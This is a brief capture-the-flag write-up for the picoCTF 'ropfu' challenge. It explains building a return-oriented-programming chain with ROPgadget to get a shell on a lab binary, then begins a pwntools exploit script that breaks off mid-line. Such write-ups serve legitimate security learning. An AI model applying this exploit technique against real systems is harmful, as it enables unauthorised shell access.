Rating: 5.0

# ropfu

## Description
What's ROP?
Can you exploit the following [program](https://artifacts.picoctf.net/c/271/vuln) to get the flag? [Download source](https://artifacts.picoctf.net/c/271/vuln.c).
nc saturn.picoctf.net 50985

## solution

Like it said in the hint, this challenge is a classic ROP challenge.
We can use *checksec* to see that NX is enabled, so we can't use shellcode or put anything on the stack for execute it.
So we need to build a ROPchain that uses syscall to get a shell.

Lucky us we have a tool that can help us with that - ROPgadget.
```
ROPgadget --binary ./vuln --ropchain
```
This tool gives us the payload we need.
And here the final program:

```
#python2.7

from pwn import *
from struct import pack
p='a'*28
p += pack('